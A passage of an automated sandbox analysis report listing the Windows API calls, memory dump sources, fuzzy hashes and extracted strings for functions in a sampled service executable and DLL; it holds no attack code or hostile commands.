                                      • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004324
                                      • Part of subcall function 00000001400042B0: RpcServerUnregisterIf.RPCRT4 ref: 0000000140004336
                                      • Part of subcall function 00000001400042B0: RpcMgmtStopServerListening.RPCRT4 ref: 000000014000433E
                                      • Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000435A
                                      • Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000437F
                                      • Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000438C
                                      • Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043C0
                                      • Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043CC
                                      • Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043D9
                                      • Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043E6
                                    • SetServiceStatus.ADVAPI32 ref: 000000014000134B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: CriticalSection$Server$CloseEnterHandleLeaveService$DeleteEventObjectProcessRegisterSingleStatusWait$CancelContextCreateCtrlCurrentDontErrorHandlerInitializeLastListenListeningMgmtOpenProtseqSerializeStopTerminateThreadTimerTokenUnregisterVersionWaitable
                                    • String ID: vseamps
                                    • API String ID: 3197017603-3944098904
                                    • Opcode ID: 4fcaac044f33b8282c396f0e62c58db51f87a82aaa34d44751bf9634b5fd9f61
                                    • Instruction ID: 0252cca9582b7aeb0e5a7a434c8e7364f46e89616d8e728b6478e43ab65cb610
                                    • Opcode Fuzzy Hash: 4fcaac044f33b8282c396f0e62c58db51f87a82aaa34d44751bf9634b5fd9f61
                                    • Instruction Fuzzy Hash: B921A2B1625A009AEB02DF17FC85BD637A0B74C798F45621AB7498F275CB7EC148CB00
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: Messagesprintf_s
                                    • String ID: 10:52:57$Help$Jul 5 2019$usage: /service - creates the Update Notification Service /remove - removes the Update Notification Service from the sy
                                    • API String ID: 2642950106-3610746849
                                    • Opcode ID: 3f0d62457ab29cf1d3a00b30af1be048753c3c69edf33eb8bb254d4fd9f99961
                                    • Instruction ID: 92f91a294e228129c374272f9a209b177778b3d46068e39525b46f8f62cf975d
                                    • Opcode Fuzzy Hash: 3f0d62457ab29cf1d3a00b30af1be048753c3c69edf33eb8bb254d4fd9f99961
                                    • Instruction Fuzzy Hash: 78F01DB1221A8595FB52EB61F8567D62364F78C788F811112BB4D0B6BADF3DC219C700
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: Heap$FreeProcess
                                    • String ID:
                                    • API String ID: 3859560861-0
                                    • Opcode ID: 59e576179aebbdeaae5a9514a8abdff9d95dfae3be86bd59f8deebe969e5cf48
                                    • Instruction ID: 80974503ddc58818480ab649a73b779641f1d99de81085d1f592bfbfa5fc6ad1
                                    • Opcode Fuzzy Hash: 59e576179aebbdeaae5a9514a8abdff9d95dfae3be86bd59f8deebe969e5cf48
                                    • Instruction Fuzzy Hash: 9C01EDB8701B8041EB0BDFE7B60839992A2AB8DFD5F185024AF1D17779DE3AC4548700
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: Heap$FreeProcess
                                    • String ID:
                                    • API String ID: 3859560861-0
                                    • Opcode ID: 00b9fd02b01b7cf63ee49650963a307f7fdb827e7083e7606ed54f4b62f321e5
                                    • Instruction ID: 9f3d0c666f817a9e432213240f72880bf7997caebe097eb0308f7621ef9b933c
                                    • Opcode Fuzzy Hash: 00b9fd02b01b7cf63ee49650963a307f7fdb827e7083e7606ed54f4b62f321e5
                                    • Instruction Fuzzy Hash: 20010CB9601B8081EB4BDFE7B608399A2A2FB8DFD4F089024AF0917739DE39C4548200
                                    APIs
                                    • GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6E7
                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6FD
                                    • GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F72B
                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F799
                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F84C
                                    • GetStringTypeA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F911
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: StringType$ByteCharMultiWide$ErrorLast
                                    • String ID:
                                    • API String ID: 319667368-0
                                    • Opcode ID: 2ce6724d946986cc12a56c103b001eb9d1b53e8cfd560fc16f2f6c38bb9960ce
                                    • Instruction ID: 469d978012ccf723a2c6c682b25d7e2ba576a75483cbf286a89393a26fd70a6f
                                    • Opcode Fuzzy Hash: 2ce6724d946986cc12a56c103b001eb9d1b53e8cfd560fc16f2f6c38bb9960ce
                                    • Instruction Fuzzy Hash: E3817EB2200B8096EB62DF27A4407E963A5F74CBE4F548215FB6D57BF4EB78C546A300
                                    APIs
                                    • GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE38
                                    • GetLastError.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE4E
                                      • Part of subcall function 00000001400090F0: HeapAlloc.KERNEL32(?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423,?,?,?,000000014000FC9E), ref: 0000000140009151
                                    • MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AEDE
                                    • MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF85
                                    • GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF9C
                                    • GetStringTypeA.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AFFB
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: StringType$ByteCharMultiWide$AllocErrorHeapLast
                                    • String ID:
                                    • API String ID: 1390108997-0
                                    • Opcode ID: 5ea1a9254b1b0246406da4d01ea544830426ccb00ebf91cd2bb510eeaa7b453f
                                    • Instruction ID: bb54969f148ae750ab4279c880304e23b66920be01f6227d0c0ffa95ca0b2e73
                                    • Opcode Fuzzy Hash: 5ea1a9254b1b0246406da4d01ea544830426ccb00ebf91cd2bb510eeaa7b453f
                                    • Instruction Fuzzy Hash: 1B616CB22007818AEB62DF66E8407E967E1F74DBE4F144625FF5887BE5DB39C9418340
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727823859.00007FFE1A4C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A4C0000, based on PE: true
                                    • Associated: 00000005.00000002.2727798107.00007FFE1A4C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727917117.00007FFE1A4D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727935928.00007FFE1A4DD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727952107.00007FFE1A4DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ffe1a4c0000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                    • String ID: csm$csm$csm
                                    • API String ID: 3523768491-393685449
                                    • Opcode ID: 7f01d96fb52924c6f5fc1d666da4b107b2a99de0eb80eb6c113e4145ccbd24ec
                                    • Instruction ID: 939cc247c4c59751e97e3792d57f705447d71fb9536ed6ea71b01dee638c6d46
                                    • Opcode Fuzzy Hash: 7f01d96fb52924c6f5fc1d666da4b107b2a99de0eb80eb6c113e4145ccbd24ec
                                    • Instruction Fuzzy Hash: 06E1E332B08B828AE7209F36D4443BD77A0FB44B68F5401B6DE8D4766ACF38E5A1C741
                                    APIs
                                    • GetLastError.KERNEL32(?,?,?,00007FFE1A4C8BC9,?,?,?,?,00007FFE1A4C8C14), ref: 00007FFE1A4C95CB
                                    • FlsSetValue.KERNEL32(?,?,?,00007FFE1A4C8BC9,?,?,?,?,00007FFE1A4C8C14), ref: 00007FFE1A4C9601
                                    • FlsSetValue.KERNEL32(?,?,?,00007FFE1A4C8BC9,?,?,?,?,00007FFE1A4C8C14), ref: 00007FFE1A4C962E
                                    • FlsSetValue.KERNEL32(?,?,?,00007FFE1A4C8BC9,?,?,?,?,00007FFE1A4C8C14), ref: 00007FFE1A4C963F
                                    • FlsSetValue.KERNEL32(?,?,?,00007FFE1A4C8BC9,?,?,?,?,00007FFE1A4C8C14), ref: 00007FFE1A4C9650
                                    • SetLastError.KERNEL32(?,?,?,00007FFE1A4C8BC9,?,?,?,?,00007FFE1A4C8C14), ref: 00007FFE1A4C966B
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727823859.00007FFE1A4C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A4C0000, based on PE: true
                                    • Associated: 00000005.00000002.2727798107.00007FFE1A4C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727917117.00007FFE1A4D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727935928.00007FFE1A4DD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727952107.00007FFE1A4DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ffe1a4c0000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: Value$ErrorLast
                                    • String ID:
                                    • API String ID: 2506987500-0
                                    • Opcode ID: 33ee88f61e6773b2952d25dee95f1e22d8cbd108a9fa28cb936705bbce5dbc3e
                                    • Instruction ID: e49fe522183b04e6d55ac23c51347fe000467c410b1e09902aa0b85fc2d5e023
                                    • Opcode Fuzzy Hash: 33ee88f61e6773b2952d25dee95f1e22d8cbd108a9fa28cb936705bbce5dbc3e
                                    • Instruction Fuzzy Hash: B1116A28B0DA426AFB556733555113D22829F44FB0F8447F7E87E866FBEE6CA4628200
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: CloseCriticalHandleSection$EnterEventLeaveObjectSingleWait
                                    • String ID:
                                    • API String ID: 3326452711-0
                                    • Opcode ID: 090e3fcaa9eba1e18c75aea56b56e2fd2f402425d5e54323bcdd5196f3225223
                                    • Instruction ID: 377d3f5d57f943d14cdd7bc93d1ee7868a659259fbd0ecc80ccbf17849fffa4f
                                    • Opcode Fuzzy Hash: 090e3fcaa9eba1e18c75aea56b56e2fd2f402425d5e54323bcdd5196f3225223
                                    • Instruction Fuzzy Hash: 71F00274611D05D5EB029F53EC953942362B79CBD5F590111EB0E8B270DF3A8599C705
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: CriticalSection$EnterLeaveTimerWaitable
                                    • String ID: amps_Exec: pHandle=%p, execId=%d, iParam=%d
                                    • API String ID: 2984211723-1229430080
                                    • Opcode ID: 8fa1b459277aeb819b509878b21750225505e1aa195fd5cfddc3614e408b1588
                                    • Instruction ID: 21f659f61b14fb79d6609d2ab4e2a3109e2b4daa988e78f6170daec752ad98bd
                                    • Opcode Fuzzy Hash: 8fa1b459277aeb819b509878b21750225505e1aa195fd5cfddc3614e408b1588
                                    • Instruction Fuzzy Hash: 2C311375614B4082EB228F56F890B9A7360F78CBE4F480225FB6C4BBB4DF7AC5858740
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727823859.00007FFE1A4C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A4C0000, based on PE: true
                                    • Associated: 00000005.00000002.2727798107.00007FFE1A4C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727917117.00007FFE1A4D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727935928.00007FFE1A4DD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727952107.00007FFE1A4DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ffe1a4c0000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: AddressFreeHandleLibraryModuleProc
                                    • String ID: CorExitProcess$mscoree.dll
                                    • API String ID: 4061214504-1276376045
                                    • Opcode ID: 0eaf2309885660167acf271fd0a1c535a59c62651c8a9772c1b781fc3320bbcf
                                    • Instruction ID: c0cf49a44d33e0dc5b9c5433f18908d4c11304275908aa310339e3b3461eb30a
                                    • Opcode Fuzzy Hash: 0eaf2309885660167acf271fd0a1c535a59c62651c8a9772c1b781fc3320bbcf
                                    • Instruction Fuzzy Hash: F8F04F61B19E0282EB108B26A4943396320AF95BB5F9407F6DA6D462F8DF3CE059C340
                                    APIs
                                    • GetModuleHandleA.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 000000014000851F
                                    • GetProcAddress.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 0000000140008534
                                    • ExitProcess.KERNEL32 ref: 0000000140008545
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: AddressExitHandleModuleProcProcess
                                    • String ID: CorExitProcess$mscoree.dll
                                    • API String ID: 75539706-1276376045
                                    • Opcode ID: 4ddf6373e7a566e00e4fa2e7ca5c7f01cf3397e3372fa5b750933ca2dd1c2c09
                                    • Instruction ID: f47e7dafb9c87e29c0f228a4507f2bac89d7b1d3f8a3a9cfd33eb857191fa9e3
                                    • Opcode Fuzzy Hash: 4ddf6373e7a566e00e4fa2e7ca5c7f01cf3397e3372fa5b750933ca2dd1c2c09
                                    • Instruction Fuzzy Hash: 3AE04CB0711A0052FF5A9F62BC947E823517B5DB85F481429AA5E4B3B1EE7D85888340
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727823859.00007FFE1A4C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A4C0000, based on PE: true
                                    • Associated: 00000005.00000002.2727798107.00007FFE1A4C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727917117.00007FFE1A4D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727935928.00007FFE1A4DD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727952107.00007FFE1A4DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ffe1a4c0000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: AdjustPointer
                                    • String ID:
                                    • API String ID: 1740715915-0
                                    • Opcode ID: 50c4e1713d184cdf0fe8662c588dfc2dc4bd464af84c2e8e24b447969137b9d6
                                    • Instruction ID: 8a60bf5aad5b74013ca3e137b9152b06b799f8074d20503e2ebd939825871406
                                    • Opcode Fuzzy Hash: 50c4e1713d184cdf0fe8662c588dfc2dc4bd464af84c2e8e24b447969137b9d6
                                    • Instruction Fuzzy Hash: 4DB1B125B0AE4281EB65DB5396492386390AF54FE4F9984F7DE4D077AEDE3CE4618300
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: FileInfoSleepStartupType
                                    • String ID:
                                    • API String ID: 1527402494-0
                                    • Opcode ID: b08a78d08636f6435b28fe3dd3a9dc7fe07bd3625b9b0f375563a7ba95a95139
                                    • Instruction ID: 2708af0267d8365e54dad009941ca9060f987db411f69ca3ecc20d856229d7df
                                    • Opcode Fuzzy Hash: b08a78d08636f6435b28fe3dd3a9dc7fe07bd3625b9b0f375563a7ba95a95139
                                    • Instruction Fuzzy Hash: 68917DB260468085E726CB2AE8487D936E4A71A7F4F554726EB79473F1DA7EC841C301
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: CommandLine$ByteCharErrorLastMultiWide
                                    • String ID:
                                    • API String ID: 3078728599-0
                                    • Opcode ID: ef26d27679934e8a1eb9f7884d3deda4952e844cae744d2e9e47d116f2e36b92
                                    • Instruction ID: cab5f27f5268d67fa2b955b7a4895f7bd1e416bc4c6d53bc856f5ac88b27d897
                                    • Opcode Fuzzy Hash: ef26d27679934e8a1eb9f7884d3deda4952e844cae744d2e9e47d116f2e36b92
                                    • Instruction Fuzzy Hash: 04316D72614A8082EB21DF52F80479A77E1F78EBD0F540225FB9A87BB5DB3DC9458B00
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: Console$Write$ByteCharCreateErrorFileLastMultiOutputWide
                                    • String ID:
                                    • API String ID: 1850339568-0
                                    • Opcode ID: 4201eac49788cf302f684002ef01a2526af238478ded1ce40358f727cda20400
                                    • Instruction ID: bea3f08d648c3b04eb316e4c6042deaac10e1fdf59f4257f2eabc448b4c653dc
                                    • Opcode Fuzzy Hash: 4201eac49788cf302f684002ef01a2526af238478ded1ce40358f727cda20400
                                    • Instruction Fuzzy Hash: 38317AB1214A4482EB12CF22F8403AA73A1F79D7E4F544315FB6A4BAF5DB7AC5859B00
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727823859.00007FFE1A4C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A4C0000, based on PE: true
                                    • Associated: 00000005.00000002.2727798107.00007FFE1A4C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727917117.00007FFE1A4D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727935928.00007FFE1A4DD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727952107.00007FFE1A4DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ffe1a4c0000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: _set_statfp
                                    • String ID:
                                    • API String ID: 1156100317-0
                                    • Opcode ID: 4d3c2bc84a878a3ff3d229176cc4d467c3c986fbb6f3ea169b2dd3d189eb8c82
                                    • Instruction ID: 2fd7e2b00d63da3d6ff392e8da02c71f57c05e083912183f9778b9f7cd69117f
                                    • Opcode Fuzzy Hash: 4d3c2bc84a878a3ff3d229176cc4d467c3c986fbb6f3ea169b2dd3d189eb8c82
                                    • Instruction Fuzzy Hash: 74119172F18F0B01F754116AE56637910416FA8BB5F9806F6E9AF062FFAF2CA8604101
                                    APIs
                                    • FlsGetValue.KERNEL32(?,?,?,00007FFE1A4C766F,?,?,00000000,00007FFE1A4C790A,?,?,?,?,?,00007FFE1A4C7896), ref: 00007FFE1A4C96A3
                                    • FlsSetValue.KERNEL32(?,?,?,00007FFE1A4C766F,?,?,00000000,00007FFE1A4C790A,?,?,?,?,?,00007FFE1A4C7896), ref: 00007FFE1A4C96C2
                                    • FlsSetValue.KERNEL32(?,?,?,00007FFE1A4C766F,?,?,00000000,00007FFE1A4C790A,?,?,?,?,?,00007FFE1A4C7896), ref: 00007FFE1A4C96EA
                                    • FlsSetValue.KERNEL32(?,?,?,00007FFE1A4C766F,?,?,00000000,00007FFE1A4C790A,?,?,?,?,?,00007FFE1A4C7896), ref: 00007FFE1A4C96FB
                                    • FlsSetValue.KERNEL32(?,?,?,00007FFE1A4C766F,?,?,00000000,00007FFE1A4C790A,?,?,?,?,?,00007FFE1A4C7896), ref: 00007FFE1A4C970C
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727823859.00007FFE1A4C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A4C0000, based on PE: true
                                    • Associated: 00000005.00000002.2727798107.00007FFE1A4C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727917117.00007FFE1A4D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727935928.00007FFE1A4DD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727952107.00007FFE1A4DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ffe1a4c0000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: Value
                                    • String ID:
                                    • API String ID: 3702945584-0
                                    • Opcode ID: bb51f29ac47eeb1f6796421cb9a02d5f68bea7befc5ae5f024f95b6d7c89f858
                                    • Instruction ID: 2fda6c3d48085574eaa7fdbd5fefdd09270eba69a7e99d7fce3790ba5c62ed3a
                                    • Opcode Fuzzy Hash: bb51f29ac47eeb1f6796421cb9a02d5f68bea7befc5ae5f024f95b6d7c89f858
                                    • Instruction Fuzzy Hash: F6119D24B0EE42A9FB586737655117921419F40FF0F8453F6E87D866FFEE6CA4628200
                                    APIs
                                    Memory Dump Source
